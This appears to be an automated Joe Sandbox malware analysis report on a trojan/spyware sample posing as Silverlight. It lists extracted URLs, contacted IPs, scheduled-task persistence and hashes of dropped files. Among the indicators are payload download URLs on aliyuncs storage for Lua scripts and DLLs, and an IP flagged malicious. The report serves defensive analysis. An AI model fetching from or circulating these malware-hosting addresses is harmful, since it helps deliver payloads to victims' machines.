http://g.msn.com/1ewenusDefaultPack/MSA_Link_JAJP5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_J	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_FRFR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_F	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_UKUA5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_U	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_NLNL5http://g.msn.com/1ewenusDefaultPack/	install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_DADK5http://	install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_MSMY5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_M	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_TRTR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_T	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://lualibs.oss-accelerate.aliyuncs.com/x86/ScheduleTask.dllmo	lua.exe, 0000002C.00000003.340221655.0000000000954000.00000004.00000001.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link0http://g.msn.com/1ewenusDefaultPack/Privacy_Link	install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_HUHU5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_H	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_NBNO5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_N	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/SLV5_DefaultPackopenen-usBingServicestartedtemp	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, microsoft_defaults.exe, 00000013.00000002.255409971.0000000000230000.00000002.00020000.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ESES5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_RORO5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_R	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link0http://g.msn.com/1ewenusDefaultPack/Privacy_LinkPA	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_PLPL5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_P	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_LTLT5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_L	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_SISI5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_S	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_SKSK5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_S	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_NLNL5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_N	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_BGBG5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_B	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ZHTW5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_Z	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_HRHR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_H	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://lualibs.oss-accelerate.aliyuncs.com/x86/ScheduleTask.dll	lua.exe, 0000002C.00000003.340221655.0000000000954000.00000004.00000001.sdmp	false		high
http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua	luac.exe, 00000003.00000002.482270263.0000000000435000.00000004.00000020.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_EUES5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_CAES5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_C	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_SRLATN7http://g.msn.com/1ewenusDefaultPack/Privacy_Link	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_HEIL5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_H	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/SLV5_DefaultPack	microsoft_defaults.exe	false		high
http://127.0.0.1:	luac.exe, 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp, lua.exe, 0000002C.00000003.339789802.000000000095F000.00000004.00000001.sdmp, lua.exe, 0000002C.00000003.340221655.0000000000954000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:43990	lua.exe, 0000002C.00000003.340133863.00000000009F5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/1-CS-443.lua	luac.exe, 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ELGR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_LVLV5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_L	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_SVSE5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_S	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_VIVN5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_V	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://softres.oss-accelerate.aliyuncs.com/Silverlight.exe	WhQZ6UbCEY.exe, 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp, WhQZ6UbCEY.exe, 00000001.00000003.230056102.00000246AF9C8000.00000004.00000001.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_KKKZ5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_K	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_IDID5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_I	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
47.254.186.176	eu-central-1.oss-acc.aliyuncs.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
45.154.13.94	unknown	Netherlands	266827	BOHOBEACHCLUBSAHN	true
47.75.19.154	lualibs.oss-cn-hongkong.aliyuncs.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	447036
Start date:	12.07.2021
Start time:	10:27:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 18m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	WhQZ6UbCEY (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.troj.spyw.evad.winEXE@227/1060@8/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.1% (good quality ratio 38.9%) Quality average: 77% Quality standard deviation: 28.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 13.64.90.137, 104.43.139.144, 52.147.198.201, 20.50.102.62, 52.255.188.83, 93.184.221.240, 52.142.114.176, 95.100.51.212, 95.100.54.203, 51.103.5.159, 23.10.249.26, 23.10.249.43, 40.112.88.60 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, dlc-shim.trafficmanager.net, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, download.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e3673.dscg.akamaiedge.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size exceeded maximum capacity and may have missing network information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found. Report size getting too big, too many NtWriteFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/447036/sample/WhQZ6UbCEY.exe

Simulations

Behavior and APIs

Time	Type	Description
10:28:46	Task Scheduler	Run new task: Silverlight path: C:\Users\user\AppData\Roaming\Silverlight.exe
10:29:01	API Interceptor	4x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	ZNT73q3qWG.exe	Get hash	malicious	Browse	47.75.19.237
	mvl22DqZF8.exe	Get hash	malicious	Browse	47.75.19.237
	0iNZ4rCeL1.exe	Get hash	malicious	Browse	47.75.19.237
	ndrc8MHq4z.exe	Get hash	malicious	Browse	47.75.19.237
	31yC3Nvg8Q.exe	Get hash	malicious	Browse	47.75.19.237
	OvIFrFQ2Zz.exe	Get hash	malicious	Browse	47.75.19.237
	ja15T5Kdh0.exe	Get hash	malicious	Browse	47.75.19.237
	NDXIRZHHaV.exe	Get hash	malicious	Browse	47.75.19.237
	1dWWqlPO9X.exe	Get hash	malicious	Browse	47.75.19.237
	Yfp7FumWl3.exe	Get hash	malicious	Browse	47.75.19.237
	y483xhG77x.exe	Get hash	malicious	Browse	47.75.19.237
	MBwT7wjJ6f.exe	Get hash	malicious	Browse	47.75.19.237
	vc5kfGEY5x.exe	Get hash	malicious	Browse	47.75.19.237
	DuQMZf5KLI.exe	Get hash	malicious	Browse	47.75.19.237
	pjdniP9bPg.exe	Get hash	malicious	Browse	47.75.19.237
	shgqSuKnSz.exe	Get hash	malicious	Browse	47.75.19.237
	irMfUc0NY6.exe	Get hash	malicious	Browse	47.75.19.237
	CEucHfJIv0.exe	Get hash	malicious	Browse	47.75.19.237
	Vlgdr95j6X.exe	Get hash	malicious	Browse	47.75.19.237
	FAV6V0cyP7.exe	Get hash	malicious	Browse	47.75.19.237

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	V34M1dCYvw.dll	Get hash	malicious	Browse	45.154.13.94
	FQ4jzOGrg6udVQoV9d7S.exe	Get hash	malicious	Browse	45.154.13.94
	FQ4jzOGrg6udVQoV9d7S.exe	Get hash	malicious	Browse	45.154.13.94
	1DUGf1rRWe.dll	Get hash	malicious	Browse	45.154.13.94
	RefdkUTxiF.exe	Get hash	malicious	Browse	45.154.13.94
	4z5jQqNiJl.exe	Get hash	malicious	Browse	45.154.13.94
	Wws1Rnd02H.exe	Get hash	malicious	Browse	45.154.13.94
	HTbemZcLWN.exe	Get hash	malicious	Browse	45.154.13.94
	nC4niiFqg0.exe	Get hash	malicious	Browse	45.154.13.94
	5r2dXy5qnF.exe	Get hash	malicious	Browse	45.154.13.94
	NXnzk26D18.exe	Get hash	malicious	Browse	45.154.13.94
	T6gSSuuGBL.exe	Get hash	malicious	Browse	45.154.13.94
	GxlYBYRPh3.dll	Get hash	malicious	Browse	45.154.13.94
	I9xIh9mYsV.dll	Get hash	malicious	Browse	45.154.13.94
	mTTBWOAhgo.dll	Get hash	malicious	Browse	45.154.13.94
	StCQGgMy3h.exe	Get hash	malicious	Browse	45.154.13.94
	xpZxzOH7yG.exe	Get hash	malicious	Browse	45.154.13.94
	3yTxbSzKPF.exe	Get hash	malicious	Browse	45.154.13.94
	BazarLoader.exe	Get hash	malicious	Browse	45.154.13.94
	MM3ZWWBO2P.exe	Get hash	malicious	Browse	45.154.13.94

Dropped Files

No context

Created / dropped Files

C:\5a70dbc53fcf0baade86ff\$shtdwn$.req Download File
Process:	C:\Users\user\AppData\Roaming\Silverlight.exe
File Type:	data
Category:	dropped
Size (bytes):	788
Entropy (8bit):	0.09823380614560741
Encrypted:	false
SSDEEP:	3:lbll/:lB
MD5:	DF7119A5D3CAEDA80BF0FB6F8E53DE8F
SHA1:	76458E1D2E0FA4519FACB71A5F23F8799713BE2B
SHA-256:	3C418A401CBE09F64EDE6E598C5CA36717830446147C8EF6327168EDC7B1CB0C
SHA-512:	85142D1942111783303FA060348BC76B1DD361336DCCC9DC9CDD3432EC6CF215756CBA66A367E560C9D5719BA4F585434319A66D9A97D9A09F5AC4A752B00B6C
Malicious:	false
Preview:	Sdwn................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\5a70dbc53fcf0baade86ff\Silverlight.msp Download File
Process:	C:\5a70dbc53fcf0baade86ff\install.exe
File Type:	151126039
Category:	dropped
Size (bytes):	23695360
Entropy (8bit):	6.581221070269091
Encrypted:	false
SSDEEP:	393216:pifRp/R8lX3s4TYpR61UaLpfVMjIIfpAB/TW6M/IHiZ:0xu3s4qU1UQpfVdIfpAtM/IHiZ
MD5:	E7814686CC3233BE9059175F9110F2FF
SHA1:	5F97D921E129737BD29FDAA078D1ED69F76B2A5E
SHA-256:	9B05949E15A483EDF3158D5A22AE10AC4C2851C26F1F5E0F616D33A0E390619D
SHA-512:	FAD55610AC5CE287FF4B4806E809F971DB08F2E47D8051984DF353A0289ED9D8C2A98B0672EC836E08BFAF467A3FD65F34464F868BB612D6925AC8BF81E239F8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\5a70dbc53fcf0baade86ff\install.exe Download File
Process:	C:\Users\user\AppData\Roaming\Silverlight.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	230080
Entropy (8bit):	6.404213640684501
Encrypted:	false
SSDEEP:	3072:Kint4fSNEmMftH0zlPlMNw6bn7YwJ+r4ZDwl5ApdxY7I:V4fNxWzzMNbPZDw4pdh
MD5:	B8A93D5A9BCFC67393584CA0DE0D3FC9
SHA1:	520CF0870DBEF59BBD87BCD2E8AFBD31249359AE
SHA-256:	89F6FC0F30BE8026FF9E21D53D6D1C3CA262CE77C07D3A9D4A382C2E415CF424
SHA-512:	A38022E52D0C2ED3A97130B10CA53A2B58F16D18DF9C256CC57BA5C2E2ED12F89E904A4C3678DB764F821EBC81DFF9C25D7C235334D2A1615DAB67DCBDE3CD13
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 2%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........e..e..e.....e.....e.....e..7..e.....&e.....e..e..d....3.e......e......e..Rich.e..........PE..L...r..[.....................T............... ....@.......................................@...... ..........................`........`..h............h.......p......................................@q..@...............D............................text...R........................... ..`.data....;... ......................@....rsrc...h....`.......,..............@..@.reloc...2...p...4...4..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\5a70dbc53fcf0baade86ff\install.res.dll Download File
Process:	C:\Users\user\AppData\Roaming\Silverlight.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	438448
Entropy (8bit):	4.974383054333743
Encrypted:	false
SSDEEP:	3072:wEqgBQp95AwHaTeNwdqSIxLux6BYw2jwc2y6XzOlJKpg5F6kBdoWdxVwnWwqkxV5:fivmw6yNrls5pNuv
MD5:	8309584086FCB83CC1FFA27CAB214B97
SHA1:	7751A9AF3705CA152A9C139E8609322548C5A539
SHA-256:	D8D3854D775E23FC9E5D0CD8E5462104EA37789E5A6613F9175AA37A986E6D97
SHA-512:	C32445DCBA6DAAFCEAA3BBFAFF2183C316CF209A7C97D7EE006325D3E304662C428576CACF2DE3931173560C5173D6D95422E3A8F08003067F8A71A2B60E3707
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L...k..[...........!.....................................................................@...... ................................... ...............................................................................................................text...k...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe Download File
Process:	C:\Users\user\AppData\Roaming\Silverlight.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	119968
Entropy (8bit):	5.90991491651561
Encrypted:	false
SSDEEP:	1536:eVPLTP1XkwioeDEfkzzz4+adcBjtsWjkdzzLGyr5m1PVaai:ednP1Xie24+aM6zzLGyr5m1PV7i
MD5:	64CADAEF6DCF7B6A6171FC1A2BEE94A1
SHA1:	89B67F711F1F98F9991C688B32C555CC597F09BC
SHA-256:	5720BD8E18456D0B96CD4BDBB715C2217A1EE30609DD05C195895874105A557C
SHA-512:	C0FE11F5575659E53CC5E0A37F68524A2C90633B9E1D931791329B320B4884FD7131328CC7EF02691BE2309EB4F42A1968A7B4E144ED83DCBDF284A570EB353B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k..k.k..k..k.h..k..k.i..k....5..k...k...k....u..k....o..k...k1..k....j..k..Rich.k..................PE..L...c`'U.............................J............@......................................@..................................b..........................................8...........................hV..@............................................text............................... ..`.rdata...l.......n..................@..@.data....3...p.......Z..............@....rsrc................n..............@..@.reloc...E.......F...t..............@..B........................................................................................................................................................................................................................................................................................................................

C:\5a70dbc53fcf0baade86ff\silverlight.7z Download File
Process:	C:\Users\user\AppData\Roaming\Silverlight.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	6721476
Entropy (8bit):	7.999971546928553
Encrypted:	true
SSDEEP:	98304:FMCfbOkBNVBR0l5xh878JcDzTmG4uFHdEDCgzpIhwWIgjmq5Ee+0fjDPU:HOaVBRm+6qejuxdEDCSIyWdj9ueVrU
MD5:	B0369C065B1D24800F944592D8A20C9E
SHA1:	8C8C03A01D1249D3DB3EB78D034622F6D073F78E
SHA-256:	24F7E7BA3978F1255246978478740DF349D8C93138DEA2ACACA0FA2A225567D7
SHA-512:	7788C1D5E396009BF3D7FEEABBB8948811DB6E11FB5DD35FC81C000048A469B428C08500FC6BB8E554B33AE651618C392DCCC0AEE3BB3952B29CF897AE18A1D7
Malicious:	false
Preview:	7z..'.....Y'..f.............]..G.h3.?.1T.YP....+.^6.%...n;...i.P:....J.p..u.YU.r.L.em-.u..._..\|.'i...L.nj.t..ue!.......N..4h@.b..b.;z.$....=...#.x0d...."[`..o!..l..G3R..[..w........n2Y..?...@\.l..H#.dt}...p..........n.I..-....M..B....7.....(]/e.....f.M......Z..;.l[.u..L.B^..Y..O)}e_."...T1.G3.YU^.i..\|..~..1...:.~.<.P7.....D.o..x..\Ka\>].L....9.......7i...@...ru...b.1........3.u.Q7..`..t>Xf......y....{.D..o....[....X.K...15.u.k.....PC;..j..9JB.....o......9......L.<......r:Ow....Q.<i;9\|....N..@..@..{l)u..8....u..)t...uu.....K^...I....,......r......zh..2$.{4..@.F.2.=....4...0...G..F......(R@;...L.2.Y.Z.l...31.:CH.\.C.....2J".K...x..8..Q5Bavl+.x....a...W..M.Y.g....j.H...HB.y........$.Cx..........&.NM...C.I...s..Mf.b.}.k....%U....Q...T.......1_Z.P[.q.s...-..e..2.3m..Q..........:."zsy.2.T[u=.D.S.,....r..V.'....J...4.m.`....W.(......\..&W.....5.]...Jd..D...1.K,..HB.R_..I.;.Q. ......Q....).ud....4CW...t.V.> ,.'.>=.........i..>.5..P.^."

C:\5a70dbc53fcf0baade86ff\silverlight.msi Download File
Process:	C:\Users\user\AppData\Roaming\Silverlight.exe
File Type:	2
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	4.7809093871930815
Encrypted:	false
SSDEEP:	384:nQKs6ez1lx8888xMQcBMSP0QRIVV6IMKBc8888GAwxQ2p2y3M5ICwXvrSsAodgg0:MzTMQ78QBRL2WMmCKr3ueWMmC3jWBF
MD5:	7B6AE168AD8FDF63153A9876C645D0E6
SHA1:	551BBACDD90F908D14E44F603DAFA07E64FF9F7A
SHA-256:	D9F4BA60BB62B33F5B0C95939D118A78B3758FF67484BB981A5105B8A30BB768
SHA-512:	C60E0908130358152CE98F6C42F8353C53BCD01688FDAFFE663E0CC458A9EBAF274E76867E38D993D9036EF0C86D97E68C49332F7494072F6BF3AF38DBE92E03
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorlib.ni.dll Download File
Process:	C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
File Type:	data
Category:	dropped
Size (bytes):	6417384
Entropy (8bit):	6.738793673932851
Encrypted:	false
SSDEEP:	196608:MXsYHiZZiLOUOZpb7GAlMT5WxD0yIbZmcUUzgi:MXsYHiZAKVpS5kD07ZbUMgi
MD5:	E6D1B7A19E6163E12C84E33C2CDB1087
SHA1:	5C63D804278BF2CB14DA4DF98C0CCEBBB669953F
SHA-256:	BD3DC7FCB638FCAB4C930AAD6B3391C073D5AC40CCC90A836DE58E7F13AD716E
SHA-512:	AC2074DCE134719D4A15C31F4518BD39B9A9B8659D9C6F321E3FF7E9D606BC69E1D3B42492B9CCABE2B6FE7700ACD0F68B228FFDFFB1E44E88D3C497FB2EBC26
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\API-MS-Win-core-file-l2-1-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11792
Entropy (8bit):	6.747789003405816
Encrypted:	false
SSDEEP:	192:9VPlWphWAUD1S8f4DBQABJJX7T0q11qnajVtPxo2:9VdWphWdD1IDBRJJX7Tplxbz
MD5:	7BD70A0B41FF61D8A0FAB8DFB0328D92
SHA1:	29B437879F6B30293CBB37D6539DE81767C83798
SHA-256:	30399597B801D89CB7DA031EE82BF06685F2865A2AEE89356B71A387A484CBA4
SHA-512:	209EE90B05ABC7D9B0088D94BCD2872B84D27254135D0BBBF1933409B2C62FE9DC4666A4A6B06731D287208A16C813E0478003B5394DBC48C04E2A65AA08F3F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d....j............" .........................................................0............`.........................................`................ ..................."..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\AES.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9791
Entropy (8bit):	4.910332364250953
Encrypted:	false
SSDEEP:	192:dmQHvvK8geSDztF9+hMkRI4H1Futffyi/a1/yRdotfL:sevK9t4Ctfv/aydotfL
MD5:	413EE92CBC43A54E9B9DFA09379F5B84
SHA1:	0218FBFEADB4B894033CBCB3B2095F53C47A1706
SHA-256:	493FCD5F893AAB2907C81EBE396630588F1AEAE142B569E40803688CF401CE01
SHA-512:	8AB6F47E4AE261625CEEECE3DE67EF593C6F9AA543BFDCE208AA282016CA84D2D11F2EDDD76594F6B8AB88A5CE796E72D95FE4C57E9C9AD8CF98A0F963C8886B
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/AES.py : AES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\AES.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1390
Entropy (8bit):	4.8520824268637455
Encrypted:	false
SSDEEP:	24:1RElRp+WJ+YzJ+YVJ+EJ+YpJ+ylJ+YACJ+SJ+sJ+IT3J+OzvgMhGa4MT3DoCLBIb:4p+O+O+s+8+s+w+8+C+0+s5+OrgMhGaW
MD5:	722B3C62A721D30124D6375A823242D7
SHA1:	C0458A332EE1AD1F586FDE2C5FA692D534978601
SHA-256:	BF2D396A026DA450D721D27077FD9E21553DC97A0768801D275EA4FF11D19498
SHA-512:	D204FFEA151C70021FD450BCCB4578AB7238A89123347208102D4FF746259500C64FEE3A3FF6DACC68E45CB33DD9BBE57AAFFC48D49BD38D3F1D1E8EB6198663
Malicious:	false
